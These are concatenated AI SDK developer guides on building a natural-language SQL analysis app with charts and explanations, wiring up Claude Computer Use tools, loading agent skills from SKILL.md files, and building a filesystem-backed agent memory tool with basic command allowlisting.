Setting up Postgres with Vercel

To set up a Postgres instance on your Vercel account:

Go to Vercel.com and make sure you're logged in
Navigate to your team homepage
Click on the Integrations tab
Click Browse Marketplace
Look for the Storage option in the sidebar
Select the Neon option (recommended, but any other PostgreSQL database provider should work)
Click Install, then click Install again in the top right corner
On the "Get Started with Neon" page, click Create Database on the right
Select your region (e.g., Washington, D.C., U.S. East)
Turn off Auth
Click Continue
Name your database (you can use the default name or rename it to something like "NaturalLanguagePostgres")
Click Create in the bottom right corner
After seeing "Database created successfully", click Done
You'll be redirected to your database instance
In the Quick Start section, click Show secrets
Copy the full DATABASE_URL environment variable and use it to populate the Postgres environment variables in your .env file

About the dataset

The Unicorn List dataset contains the following information about unicorn startups (companies with a valuation above $1bn):

Company name
Valuation
Date joined (unicorn status)
Country
City
Industry
Select investors

Now that you have the dataset downloaded and added to your project, you can initialize the database with the following command:

Note: this step can take a little while. You should see a message indicating the Unicorns table has been created and then that the database has been seeded successfully.

Start the development server:

Your application should now be running at http://localhost:3000.

Project structure

The starter repository already includes everything that you will need, including:

Database seed script (lib/seed.ts)
Basic components built with shadcn/ui (components/)
Function to run SQL queries (app/actions.ts)
Type definitions for the database schema (lib/types.ts)

Existing components

The application contains a single page in app/page.tsx that serves as the main interface.

Initially, the page shows a collection of suggested example queries (suggested-queries.tsx) that you can click to quickly try out the functionality.

When you submit a query:

The suggested queries section disappears and a loading state appears
Once complete, a card appears with "TODO - IMPLEMENT ABOVE" (query-viewer.tsx) which will eventually show your generated SQL
Below that is an empty results area with "No results found" (results.tsx)

After you implement the core functionality:

The results section will display data in a table format
A toggle button will allow switching between table and chart views
The chart view will visualize your query results

Let's implement the AI-powered functionality to bring it all together.

Building the application

As a reminder, this application will have three main features:

Generate SQL queries from natural language
Create a chart from the query results
Explain SQL queries in plain English

Let's start with generating a SQL query from natural language.

Generate SQL queries

Providing context

For the model to generate accurate SQL queries, it needs context about your database schema, tables, and relationships. You will communicate this information through a prompt that should include:

Schema information
Example data formats
Available SQL operations
Best practices for query structure
Nuanced advice for specific fields

Let's write a prompt that includes all of this information:

You are a SQL (postgres) and data visualization expert. Your job is to help the user write a SQL query to retrieve the data they need. The table schema is as follows:

unicorns (
  id SERIAL PRIMARY KEY,
  company VARCHAR(255) NOT NULL UNIQUE,
  valuation DECIMAL(10, 2) NOT NULL,
  date_joined DATE,
  country VARCHAR(255) NOT NULL,
  city VARCHAR(255) NOT NULL,
  industry VARCHAR(255) NOT NULL,
  select_investors TEXT NOT NULL
);

Only retrieval queries are allowed.

For things like industry, company names and other string fields, use the ILIKE operator and convert both the search term and the field to lowercase using LOWER() function. For example: LOWER(industry) ILIKE LOWER('%search_term%').

Note: select_investors is a comma-separated list of investors. Trim whitespace to ensure you're grouping properly. Note, some fields may be null or have only one value.
When answering questions about a specific field, ensure you are selecting the identifying column (ie. what is Vercel's valuation would select company and valuation').

The industries available are:
- healthcare & life sciences
- consumer & retail
- financial services
- enterprise tech
- insurance
- media & entertainment
- industrials
- health

If the user asks for a category that is not in the list, infer based on the list above.

Note: valuation is in billions of dollars so 10b would be 10.0.
Note: if the user asks for a rate, return it as a decimal. For example, 0.1 would be 10%.

If the user asks for 'over time' data, return by year.

When searching for UK or USA, write out United Kingdom or United States respectively.

EVERY QUERY SHOULD RETURN QUANTITATIVE DATA THAT CAN BE PLOTTED ON A CHART! There should always be at least two columns. If the user asks for a single column, return the column and the count of the column. If the user asks for a rate, return the rate as a decimal. For example, 0.1 would be 10%.

There are several important elements of this prompt:

Schema description helps the model understand exactly what data fields to work with
Includes rules for handling queries based on common SQL patterns - for example, always using ILIKE for case-insensitive string matching
Explains how to handle edge cases in the dataset, like dealing with the comma-separated investors field and ensuring whitespace is properly handled
Instead of having the model guess at industry categories, it provides the exact list that exists in the data, helping avoid mismatches
The prompt helps standardize data transformations - like knowing to interpret "10b" as "10.0" billion dollars, or that rates should be decimal values
Clear rules ensure the query output will be chart-friendly by always including at least two columns of data that can be plotted

This prompt structure provides a strong foundation for query generation, but you should experiment and iterate based on your specific needs and the model you're using.

Create a Server Action

With the prompt done, let's create a Server Action.

Open app/actions.ts. You should see one action already defined (runGeneratedSQLQuery).

Add a new action. This action should be asynchronous and take in one parameter - the natural language query.

/* ...rest of the file... */

export const generateQuery = async (input: string) => {};

/* ...other imports... */
import { generateText, Output } from 'ai';
import { z } from 'zod';

/* ...rest of the file... */

export const generateQuery = async (input: string) => {
  'use server';
  try {
    const result = await generateText({
      model: 'openai/gpt-4o',
      system: `You are a SQL (postgres) ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Generate the query necessary to retrieve the data the user wants: ${input}`,
      output: Output.object({
        schema: z.object({
          query: z.string(),
        }),
      }),
    });
    return result.output.query;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

Update the frontend

Import the generateQuery function and call it with the user's input.

/* ...other imports... */
import { runGeneratedSQLQuery, generateQuery } from './actions';

/* ...rest of the file... */

const handleSubmit = async (suggestion?: string) => {
  clearExistingData();

  const question = suggestion ?? inputValue;
  if (inputValue.length === 0 && !suggestion) return;

  if (question.trim()) {
    setSubmitted(true);
  }

  setLoading(true);
  setLoadingStep(1);
  setActiveQuery('');

  try {
    const query = await generateQuery(question);

    if (query === undefined) {
      toast.error('An error occurred. Please try again.');
      setLoading(false);
      return;
    }

    setActiveQuery(query);
    setLoadingStep(2);

    const companies = await runGeneratedSQLQuery(query);
    const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
    setResults(companies);
    setColumns(columns);

    setLoading(false);
  } catch (e) {
    toast.error('An error occurred. Please try again.');
    setLoading(false);
  }
};

/* ...rest of the file... */

Explain SQL Queries

Let's craft a prompt for the explain query functionality:

You are a SQL (postgres) expert. Your job is to explain to the user the SQL query you wrote to retrieve the data they asked for. The table schema is as follows:
unicorns (
  id SERIAL PRIMARY KEY,
  company VARCHAR(255) NOT NULL UNIQUE,
  valuation DECIMAL(10, 2) NOT NULL,
  date_joined DATE,
  country VARCHAR(255) NOT NULL,
  city VARCHAR(255) NOT NULL,
  industry VARCHAR(255) NOT NULL,
  select_investors TEXT NOT NULL
);

When you explain you must take a section of the query, and then explain it. Each "section" should be unique. So in a query like: "SELECT * FROM unicorns limit 20", the sections could be "SELECT *", "FROM UNICORNS", "LIMIT 20".
If a section doesn't have any explanation, include it, but leave the explanation empty.

Create a Server Action

Add a new Server Action to generate explanations for SQL queries.

This action takes two parameters - the original natural language input and the generated SQL query.

/* ...rest of the file... */

export const explainQuery = async (input: string, sqlQuery: string) => {
  'use server';
  try {
    const result = await generateText({
      model: 'openai/gpt-4o',
      system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.

      User Query:
      ${input}

      Generated SQL Query:
      ${sqlQuery}`,
    });
    return result.text;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

This action uses the generateText function. However, you haven't defined the output schema yet. Let's define it in another file so it can also be used as a type in your components.

Update your lib/types.ts file to include the schema for the explanations:

import { z } from 'zod';

/* ...rest of the file... */

export const explanationSchema = z.object({
  section: z.string(),
  explanation: z.string(),
});

export type QueryExplanation = z.infer<typeof explanationSchema>;

// other imports
import { explanationSchema } from '@/lib/types';

/* ...rest of the file... */

export const explainQuery = async (input: string, sqlQuery: string) => {
  'use server';
  try {
    const result = await generateText({
      model: 'openai/gpt-4o',
      system: `You are a SQL (postgres) expert. ...`, // SYSTEM PROMPT AS ABOVE - OMITTED FOR BREVITY
      prompt: `Explain the SQL query you generated to retrieve the data the user wanted. Assume the user is not an expert in SQL. Break down the query into steps. Be concise.

      User Query:
      ${input}

      Generated SQL Query:
      ${sqlQuery}`,
      output: Output.array({ element: explanationSchema }),
    });
    return result.output;
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate query');
  }
};

Update query viewer

/* ...other imports... */
import { explainQuery } from '@/app/actions';

/* ...rest of the component... */

const handleExplainQuery = async () => {
  setQueryExpanded(true);
  setLoadingExplanation(true);

  const explanations = await explainQuery(inputValue, activeQuery);
  setQueryExplanations(explanations);

  setLoadingExplanation(false);
};

/* ...rest of the component... */

Now when users click the explanation button (the question mark icon), the component will:

Show a loading state
Send the active SQL query and the users natural language query to your Server Action
The model will generate an array of explanations
The explanations will be set in the component state and rendered in the UI

Submit a new query and then click the explanation button. Hover over different elements of the query. You should see the explanations for each section!

Visualizing query results

Finally, let's render the query results visually in a chart. There are two approaches you could take:

Send both the query and data to the model and ask it to return the data in a visualization-ready format. While this provides complete control over the visualization, it requires the model to send back all of the data, which significantly increases latency and costs.
Send the query and data to the model and ask it to generate a chart configuration (fixed-size and not many tokens) that maps your data appropriately. This configuration specifies how to visualize the information while delivering the insights from your natural language query. Importantly, this is done without requiring the model return the full dataset.

Since you don't know the SQL query or data shape beforehand, let's use the second approach to dynamically generate chart configurations based on the query results and user intent.

Generate the chart configuration

Chart type (bar, line, area, or pie)
Axis mappings
Visual styling

Let's start by defining the schema for the chart configuration in lib/types.ts:

/* ...rest of the file... */

export const configSchema = z
  .object({
    description: z
      .string()
      .describe(
        'Describe the chart. What is it showing? What is interesting about the way the data is displayed?',
      ),
    takeaway: z.string().describe('What is the main takeaway from the chart?'),
    type: z.enum(['bar', 'line', 'area', 'pie']).describe('Type of chart'),
    title: z.string(),
    xKey: z.string().describe('Key for x-axis or category'),
    yKeys: z
      .array(z.string())
      .describe(
        'Key(s) for y-axis values this is typically the quantitative column',
      ),
    multipleLines: z
      .boolean()
      .describe(
        'For line charts only: whether the chart is comparing groups of data.',
      )
      .optional(),
    measurementColumn: z
      .string()
      .describe(
        'For line charts only: key for quantitative y-axis column to measure against (eg. values, counts etc.)',
      )
      .optional(),
    lineCategories: z
      .array(z.string())
      .describe(
        'For line charts only: Categories used to compare different lines or data series. Each category represents a distinct line in the chart.',
      )
      .optional(),
    colors: z
      .record(
        z.string().describe('Any of the yKeys'),
        z.string().describe('Color value in CSS format (e.g., hex, rgb, hsl)'),
      )
      .describe('Mapping of data keys to color values for chart elements')
      .optional(),
    legend: z.boolean().describe('Whether to show legend'),
  })
  .describe('Chart configuration object');

export type Config = z.infer<typeof configSchema>;

Create the Server Action

Create a new action in app/actions.ts:

/* ...other imports... */
import { Config, configSchema, explanationsSchema, Result } from '@/lib/types';

/* ...rest of the file... */

export const generateChartConfig = async (
  results: Result[],
  userQuery: string,
) => {
  'use server';

  try {
    const { output: config } = await generateText({
      model: 'openai/gpt-4o',
      system: 'You are a data visualization expert.',
      prompt: `Given the following data from a SQL query result, generate the chart config that best visualises the data and answers the users query.
      For multiple groups use multi-lines.

      Here is an example complete config:
      export const chartConfig = {
        type: "pie",
        xKey: "month",
        yKeys: ["sales", "profit", "expenses"],
        colors: {
          sales: "#4CAF50",    // Green for sales
          profit: "#2196F3",   // Blue for profit
          expenses: "#F44336"  // Red for expenses
        },
        legend: true
      }

      User Query:
      ${userQuery}

      Data:
      ${JSON.stringify(results, null, 2)}`,
      output: Output.object({ schema: configSchema }),
    });

    // Override with shadcn theme colors
    const colors: Record<string, string> = {};
    config.yKeys.forEach((key, index) => {
      colors[key] = `hsl(var(--chart-${index + 1}))`;
    });

    const updatedConfig = { ...config, colors };
    return { config: updatedConfig };
  } catch (e) {
    console.error(e);
    throw new Error('Failed to generate chart suggestion');
  }
};

Update the chart component

With the action in place, you'll want to trigger it automatically after receiving query results. This ensures the visualization appears almost immediately after data loads.

Update the handleSubmit function in your root page (app/page.tsx) to generate and set the chart configuration after running the query:

/* ...other imports... */
import { getCompanies, generateQuery, generateChartConfig } from './actions';

/* ...rest of the file... */
const handleSubmit = async (suggestion?: string) => {
  clearExistingData();

  const question = suggestion ?? inputValue;
  if (inputValue.length === 0 && !suggestion) return;

  if (question.trim()) {
    setSubmitted(true);
  }

  setLoading(true);
  setLoadingStep(1);
  setActiveQuery('');

  try {
    const query = await generateQuery(question);

    if (query === undefined) {
      toast.error('An error occurred. Please try again.');
      setLoading(false);
      return;
    }

    setActiveQuery(query);
    setLoadingStep(2);

    const companies = await runGeneratedSQLQuery(query);
    const columns = companies.length > 0 ? Object.keys(companies[0]) : [];
    setResults(companies);
    setColumns(columns);

    setLoading(false);

    const { config } = await generateChartConfig(companies, question);
    setChartConfig(config);
  } catch (e) {
    toast.error('An error occurred. Please try again.');
    setLoading(false);
  }
};

/* ...rest of the file... */

Now when users submit queries, the application will:

Generate and run the SQL query
Display the table results
Generate a chart configuration for the results
Allow toggling between table and chart views

Head back to the browser and test the application with a few queries. You should see the chart visualization appear after the table results.

Next steps

You've built an AI-powered SQL analysis tool that can convert natural language to SQL queries, visualize query results, and explain SQL queries in plain English.

title: Get started with Computer Use description: Get started with Claude's Computer Use capabilities with the AI SDK tags: ['computer-use', 'tools']

Get started with Computer Use

Computer Use

Anthropic recently released a new version of the Claude 3.5 Sonnet model which is capable of 'Computer Use'. This allows the model to interact with computer interfaces through basic actions like:

Moving the cursor
Clicking buttons
Typing text
Taking screenshots
Reading screen content

How It Works

Computer Use enables the model to read and interact with on-screen content through a series of coordinated steps. Here's how the process works:

Start with a prompt and tools

Add Anthropic-defined Computer Use tools to your request and provide a task (prompt) for the model. For example: "save an image to your downloads folder."
Select the right tool

The model evaluates which computer tools can help accomplish the task. It then sends a formatted tool_call to use the appropriate tool.
Execute the action and return results

The AI SDK processes Claude's request by running the selected tool. The results can then be sent back to Claude through a tool_result message.
Complete the task through iterations

Claude analyzes each result to determine if more actions are needed. It continues requesting tool use and processing results until it completes your task or requires additional input.

Available Tools

There are three main tools available in the Computer Use API:

Computer Tool: Enables basic computer control like mouse movement, clicking, and keyboard input
Text Editor Tool: Provides functionality for viewing and editing text files
Bash Tool: Allows execution of bash commands

Implementation Considerations

Set up a controlled environment for Computer Use execution
Implement core functionality like mouse control and keyboard input
Handle screenshot capture and processing
Set up rules and limits for how Claude can interact with your system

The recommended approach is to start with Anthropic's reference implementation , which provides:

A containerized environment configured for safe Computer Use
Ready-to-use (Python) implementations of Computer Use tools
An agent loop for API interaction and tool execution
A web interface for monitoring and control

This reference implementation serves as a foundation to understand the requirements before building your own custom solution.

Getting Started with the AI SDK

First, ensure you have the AI SDK and Anthropic AI SDK provider installed:

Here's how you could set up the Computer Tool with the AI SDK:

import { anthropic } from '@ai-sdk/anthropic';
import { getScreenshot, executeComputerAction } from '@/utils/computer-use';

const computerTool = anthropic.tools.computer_20250124({
  displayWidthPx: 1920,
  displayHeightPx: 1080,
  execute: async ({ action, coordinate, text }) => {
    switch (action) {
      case 'screenshot': {
        return {
          type: 'image',
          data: getScreenshot(),
        };
      }
      default: {
        return executeComputerAction(action, coordinate, text);
      }
    }
  },
  toModelOutput({ output }) {
    return typeof output === 'string'
      ? [{ type: 'text', text: output }]
      : [{ type: 'image', data: output.data, mediaType: 'image/png' }];
  },
});

Using Computer Tools with Text Generation

Once your tool is defined, you can use it with both the generateText and streamText functions.

For one-shot text generation, use generateText:

const result = await generateText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: 'Move the cursor to the center of the screen and take a screenshot',
  tools: { computer: computerTool },
});

console.log(result.text);

For streaming responses, use streamText to receive updates in real-time:

const result = streamText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: 'Open the browser and navigate to vercel.com',
  tools: { computer: computerTool },
});

for await (const chunk of result.textStream) {
  console.log(chunk);
}

Configure Multi-Step (Agentic) Generations

import { isStepCount } from 'ai';

const stream = streamText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: 'Open the browser and navigate to vercel.com',
  tools: { computer: computerTool },
  stopWhen: isStepCount(10), // experiment with this value based on your use case
});

Combine Multiple Tools

You can combine multiple tools in a single request to enable more complex workflows. The AI SDK supports all three of Claude's Computer Use tools:

const computerTool = anthropic.tools.computer_20250124({
  ...
});

const bashTool = anthropic.tools.bash_20250124({
  execute: async ({ command, restart }) => execSync(command).toString()
});

const textEditorTool = anthropic.tools.textEditor_20250124({
  execute: async ({
    command,
    path,
    file_text,
    insert_line,
    new_str,
    insert_text,
    old_str,
    view_range
  }) => {
    // Handle file operations based on command
    switch(command) {
      return executeTextEditorFunction({
        command,
        path,
        fileText: file_text,
        insertLine: insert_line,
        newStr: new_str,
        insertText: insert_text,
        oldStr: old_str,
        viewRange: view_range
      });
    }
  }
});


const response = await generateText({
  model: 'anthropic/claude-sonnet-4-20250514',
  prompt: "Create a new file called example.txt, write 'Hello World' to it, and run 'cat example.txt' in the terminal",
  tools: {
    computer: computerTool,
    bash: bashTool,
    str_replace_editor: textEditorTool,
  },
});

Best Practices for Computer Use

To get the best results when using Computer Use:

Specify simple, well-defined tasks with explicit instructions for each step
Prompt Claude to verify outcomes through screenshots
Use keyboard shortcuts when UI elements are difficult to manipulate
Include example screenshots for repeatable tasks
Provide explicit tips in system prompts for known tasks

Security Measures

Use a dedicated virtual machine or container with minimal privileges to prevent direct system attacks or accidents.
Avoid giving the model access to sensitive data, such as account login information, to prevent information theft.
Limit internet access to an allowlist of domains to reduce exposure to malicious content.
Ask a human to confirm decisions that may result in meaningful real-world consequences as well as any tasks requiring affirmative consent, such as accepting cookies, executing financial transactions, or agreeing to terms of service.

title: Add Skills to Your Agent description: Learn how to extend your agent with specialized capabilities loaded at runtime with Agent Skills. tags: ['agent', 'skills', 'tools', 'extensibility']

Add Skills to Your Agent

In this guide, you will learn how to extend your agent with Agent Skills, a lightweight, open format for adding specialized knowledge and workflows that load at runtime from markdown files.

At its core, a skill is a folder containing a SKILL.md file with metadata and instructions that tell an agent how to perform a specific task.

my-skill/
├── SKILL.md          # Required: instructions + metadata
├── scripts/          # Optional: executable code
├── references/       # Optional: documentation
└── assets/           # Optional: templates, resources

How Skills Work

Skills use progressive disclosure to manage context efficiently:

Discovery: At startup, agents load only the name and description of each available skill (just enough to know when it might be relevant)
Activation: When a task matches a skill's description, the agent reads the full SKILL.md instructions into context
Execution: The agent follows the instructions, optionally loading referenced files or executing bundled code as needed

This approach keeps agents fast while giving them access to more context on demand.

The SKILL.md File

Every skill starts with a SKILL.md file containing YAML frontmatter and Markdown instructions:

---
name: pdf-processing
description: Extract text and tables from PDF files, fill forms, merge documents.
---

# PDF Processing

## When to use this skill
Use this skill when the user needs to work with PDF files...

## How to extract text
1. Use pdfplumber for text extraction...

## How to fill forms
...

The frontmatter requires:

name: A short identifier
description: Instructions for when to use this skill

The Markdown body contains the actual skill content with no restrictions on structure or content.

Prerequisites

To support skills, your agent needs:

Filesystem access to discover and load skill files (read files, read directories)
A load skill tool that reads the SKILL.md content into context
Command execution (optional) if skills bundle scripts (e.g. a full sandbox environment)

Step 1: Define a Sandbox Abstraction

interface Sandbox {
  readFile(path: string, encoding: 'utf-8'): Promise<string>;
  readdir(
    path: string,
    opts: { withFileTypes: true },
  ): Promise<{ name: string; isDirectory(): boolean }[]>;
  exec(command: string): Promise<{ stdout: string; stderr: string }>;
}

Step 2: Discover Skills at Startup

Scan skill directories and extract metadata from each SKILL.md:

interface SkillMetadata {
  name: string;
  description: string;
  path: string;
}

async function discoverSkills(
  sandbox: Sandbox,
  directories: string[],
): Promise<SkillMetadata[]> {
  const skills: SkillMetadata[] = [];
  const seenNames = new Set<string>();

  for (const dir of directories) {
    let entries;
    try {
      entries = await sandbox.readdir(dir, { withFileTypes: true });
    } catch {
      continue; // Skip directories that don't exist
    }

    for (const entry of entries) {
      if (!entry.isDirectory()) continue;

      const skillDir = `${dir}/${entry.name}`;
      const skillFile = `${skillDir}/SKILL.md`;

      try {
        const content = await sandbox.readFile(skillFile, 'utf-8');
        const frontmatter = parseFrontmatter(content);

        // First skill with a given name wins (allows project overrides)
        if (seenNames.has(frontmatter.name)) continue;
        seenNames.add(frontmatter.name);

        skills.push({
          name: frontmatter.name,
          description: frontmatter.description,
          path: skillDir,
        });
      } catch {
        continue; // Skip skills without valid SKILL.md
      }
    }
  }
  return skills;
}

function parseFrontmatter(content: string) {
  const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/);
  if (!match?.[1]) throw new Error('No frontmatter found');
  // Parse YAML using your preferred library
  return yaml.parse(match[1]);
}

Step 3: Build the System Prompt

Include discovered skills in the system prompt so the agent knows what's available:

function buildSkillsPrompt(skills: SkillMetadata[]): string {
  const skillsList = skills
    .map(s => `- ${s.name}: ${s.description}`)
    .join('\n');

  return `
## Skills

Use the \`loadSkill\` tool to load a skill when the user's request
would benefit from specialized instructions.

Available skills:
${skillsList}
`;
}

The agent sees only names and descriptions. Full instructions stay out of the context window until loaded.

Step 4: Create the Load Skill Tool

The load skill tool reads the full SKILL.md and returns the body (without frontmatter):

function stripFrontmatter(content: string): string {
  const match = content.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/);
  return match ? content.slice(match[0].length).trim() : content.trim();
}

const loadSkillTool = tool({
  description: 'Load a skill to get specialized instructions',
  inputSchema: z.object({
    name: z.string().describe('The skill name to load'),
  }),
  execute: async ({ name }, { context }) => {
    const { sandbox, skills } = context as {
      sandbox: Sandbox;
      skills: SkillMetadata[];
    };

    const skill = skills.find(s => s.name.toLowerCase() === name.toLowerCase());
    if (!skill) {
      return { error: `Skill '${name}' not found` };
    }

    const skillFile = `${skill.path}/SKILL.md`;
    const content = await sandbox.readFile(skillFile, 'utf-8');
    const body = stripFrontmatter(content);

    return {
      skillDirectory: skill.path,
      content: body,
    };
  },
});

The tool returns the skill directory path alongside the content so the agent can construct full paths to bundled resources.

Step 5: Create the Agent

Wire up the sandbox and skills using callOptionsSchema and prepareCall:

const callOptionsSchema = z.object({
  sandbox: z.custom<Sandbox>(),
  skills: z.array(
    z.object({
      name: z.string(),
      description: z.string(),
      path: z.string(),
    }),
  ),
});

const readFileTool = tool({
  description: 'Read a file from the filesystem',
  inputSchema: z.object({ path: z.string() }),
  execute: async ({ path }, { context }) => {
    const { sandbox } = context as { sandbox: Sandbox };
    return sandbox.readFile(path, 'utf-8');
  },
});

const bashTool = tool({
  description: 'Execute a bash command',
  inputSchema: z.object({ command: z.string() }),
  execute: async ({ command }, { context }) => {
    const { sandbox } = context as { sandbox: Sandbox };
    return sandbox.exec(command);
  },
});

const agent = new ToolLoopAgent({
  model: yourModel,
  tools: {
    loadSkill: loadSkillTool,
    readFile: readFileTool,
    bash: bashTool,
  },
  callOptionsSchema,
  prepareCall: ({ options, ...settings }) => ({
    ...settings,
    instructions: `${settings.instructions}\n\n${buildSkillsPrompt(options.skills)}`,
    context: {
      sandbox: options.sandbox,
      skills: options.skills,
    },
  }),
});

Step 6: Run the Agent

// Create sandbox (your filesystem/execution abstraction)
const sandbox = createSandbox({ workingDirectory: process.cwd() });

// Discover skills at startup
const skills = await discoverSkills(sandbox, [
  '.agents/skills',
  '~/.config/agent/skills',
]);

// Run the agent
const result = await agent.run({
  prompt: userMessage,
  options: { sandbox, skills },
});

Accessing Bundled Resources

Skills can reference files relative to their directory. The agent uses existing tools to access them:

Skill directory: /path/to/.agents/skills/my-skill

# My Skill Instructions

Read the configuration template:
templates/config.json

Run the setup script:
bash scripts/setup.sh

Learn More

Agent Skills specification for the full format details
Example skills on GitHub
Authoring best practices for writing effective skills
Reference library to validate skills and generate prompt XML
skills.sh to browse and discover community skills

title: Build a Custom Memory Tool description: Build an agent that persists memories using a filesystem-backed memory tool.

Build a Custom Memory Tool

The Storage Primitive: The Filesystem

Where should you store memories? Files organized in a filesystem-like structure are a natural fit:

Persistence: you can persist files across process restarts and conversations
Speed: reading and writing files is fast, even at scale
Familiarity: language models understand files and paths from their training data
Hierarchy: you can use a directory structure to create deep and organized memory banks, grouping memories by topic, time, or type

The Interface: A Memory Tool

You have files. Now the model needs to interact with them. You give the model a tool, along with instructions for when and how to use it. There are two approaches:

Structured Actions Tool

Define explicit actions the model can take (view, create, update, search) and have the model generate structured input that you handle yourself:

{
  "name": "memory",
  "input": {
    "command": "view",
    "path": "/memories/customer_service_guidelines.xml"
  }
}

This is safe by design since you control every operation that runs. However, it requires more upfront implementation and limits the model to only the actions you have built.

Bash-Backed Tool

Types of Memory

Not all memories are equal. They differ in how you store them, how often the model accesses them, and when they surface:

Core Memory: information included in every turn. This can range from the user's name to instructions for where to find other memories. You inject core memory directly into the system prompt, so the model always has it without needing a tool call.
Archival Memory: a notes folder or file where the model stores detailed knowledge. Think of it as the model's notebook, where it writes down facts, summaries, and observations for later. The model reads and writes archival memory on demand through the memory tool.
Recall Memory: the conversations themselves. By persisting full turn-by-turn history, the model can search previous interactions to surface relevant context from past discussions.

These memory terms are based on Letta's definitions.

What We Will Build

The memory layout is a .memory directory with three files, each mapping to one of the memory types above:

.memory/
├── core.md               # Core memory, injected every turn
├── notes.md              # Archival memory, timestamped notes
└── conversations.jsonl   # Recall memory, full turn history (JSONL)

Prerequisites

To follow this guide, you need the following:

AI SDK with ToolLoopAgent and tool
Zod for tool input schemas
Optional for Route B (bash-backed): just-bash for command execution and AST parsing

Install dependencies for both routes:

pnpm add ai just-bash zod

If you only use Route A (structured actions), you can skip just-bash.

Implementation Requirements

Before building the agent, you need shared infrastructure plus one route-specific piece:

Bootstrap the filesystem. On startup, ensure the memory directory and its files exist with reasonable defaults. This is a one-time setup step: create the directory if missing, seed each file with starter content if it does not already exist, and add the memory directory to .gitignore to keep it local and private.
Helper functions for core memory and conversation logging. You need a way to read core memory (so you can inject it into the system prompt) and a way to append conversation entries. Conversations are stored as JSONL (one JSON object per line), which makes them straightforward to grep for keywords and pipe through jq for formatting.
Route-specific execution safety.
- Route A (structured actions): keep the action set small and explicit (view, create, update, search) and only operate on known .memory paths.
- Route B (bash-backed): validate commands before execution. Users can craft prompts that try to run harmful commands, so use AST-based validation and an allowlist. See the Appendix for a full implementation with just-bash.

Step 1: Define the Memory Tool

Route A: Structured Actions Tool

Use this when you want predictable, explicit operations (view, create, update, search) and minimal command-safety surface.

Define a schema and route every request through your own runMemoryCommand handler:

import { tool } from 'ai';
import { z } from 'zod';

const memoryInputSchema = z.object({
  command: z
    .enum(['view', 'create', 'update', 'search'])
    .describe(
      'Memory action: view to read, create to write new content, update to change existing content, search to find relevant lines.',
    ),
  path: z
    .string()
    .optional()
    .describe(
      'Memory path under /memories, such as /memories/core.md or /memories/notes.md. Required for view, create, and update.',
    ),
  content: z
    .string()
    .optional()
    .describe('Text to write for create or update commands.'),
  mode: z
    .enum(['append', 'overwrite'])
    .optional()
    .describe(
      'Write mode for update: append adds to existing content, overwrite replaces it. Defaults to overwrite.',
    ),
  query: z
    .string()
    .optional()
    .describe(
      'Search keywords for the search command. Prefer short focused terms.',
    ),
});

const memoryTool = tool({
  description: `Use this tool to read and maintain long-term memory under /memories.

Rules:
- If the user prompt might depend on preferences, history, constraints, or goals, search first, then reply.
- If the prompt is fully self-contained or general knowledge, reply directly.
- Keep searches short and focused (1-4 words).
- Store durable user facts in /memories/core.md and detailed notes in /memories/notes.md.
- Keep memory operations invisible in user-facing replies.`,
  inputSchema: memoryInputSchema,
  execute: async input => {
    try {
      const output = await runMemoryCommand(input);
      return { output };
    } catch (error) {
      return { output: `Memory action failed: ${(error as Error).message}` };
    }
  },
});

This keeps memory operations predictable because the model can only call predefined actions.

Route B: Bash-Backed Tool

Use this when you want maximum flexibility in reads, writes, and ad-hoc search.

import { tool } from 'ai';
import { Bash, ReadWriteFs } from 'just-bash';
import { z } from 'zod';

const fs = new ReadWriteFs({ root: process.cwd() });
const bash = new Bash({ fs, cwd: '/' });

const memoryTool = tool({
  description: `Run bash commands only for memory-related tasks.

This tool is restricted to memory workflows. Do not use it for
general project work, code changes, dependency management, or
system administration.

Inside the tool, use paths under /.memory:
- /.memory/core.md for key facts that should be reused later
- /.memory/notes.md for detailed notes
- /.memory/conversations.jsonl for full turn history

Rules:
- Only perform memory-related reads/writes and conversation recall
- Keep /.memory/core.md short and focused
- Prefer append-friendly notes in /.memory/notes.md for details
- If the user asks about prior conversations, search
  /.memory/conversations.jsonl for relevant keywords first
- Use >> to append, > to overwrite, and perl -pi -e for in-place edits

Examples:
- cat /.memory/core.md
- echo "- User prefers concise answers" >> /.memory/core.md
- perl -pi -e 's/concise answers/detailed answers/g' /.memory/core.md
- grep -n "project" /.memory/notes.md
- echo "2026-02-16: started a Rust CLI" >> /.memory/notes.md
- grep -niE "pricing|budget" /.memory/conversations.jsonl
- tail -n 40 /.memory/conversations.jsonl | jq -c '.role + ": " + .content'`,
  inputSchema: z.object({
    command: z.string().describe('The bash command to execute.'),
  }),
  execute: async ({ command }) => {
    const unapprovedCommand = findUnapprovedCommand(command);
    if (unapprovedCommand) {
      return {
        stdout: '',
        stderr: `Blocked unapproved command: ${unapprovedCommand}\n`,
        exitCode: 1,
      };
    }

    const result = await bash.exec(command);
    return {
      stdout: result.stdout,
      stderr: result.stderr,
      exitCode: result.exitCode,
    };
  },
});

The rest of this recipe (agent wiring, prepareCall, and run loop) works for either route.

Step 2: Create the Agent

Wire everything together with ToolLoopAgent. The prepareCall hook reads core memory fresh before every LLM call and injects it into the system prompt:

import { ToolLoopAgent } from 'ai';

const today = new Date().toISOString().slice(0, 10);

const memoryAgent = new ToolLoopAgent({
  model: 'anthropic/claude-haiku-4.5',
  tools: { memory: memoryTool },
  prepareCall: async settings => {
    // user-defined function fetches the contents of /.memory/core.md on every turn
    const coreMemory = await readCoreMemory();
    return {
      ...settings,
      instructions: `Today's date is ${today}.

Core memory:
${coreMemory}

You can save and recall important information using the memory tool.`,
    };
  },
});

Step 3: Run the Agent

Bootstrap the filesystem, record conversations, and run the agent:

const prompt = 'Remember that my favorite editor is Neovim';

// Record the user message
await appendConversation({
  role: 'user',
  content: prompt,
  timestamp: new Date().toISOString(),
});

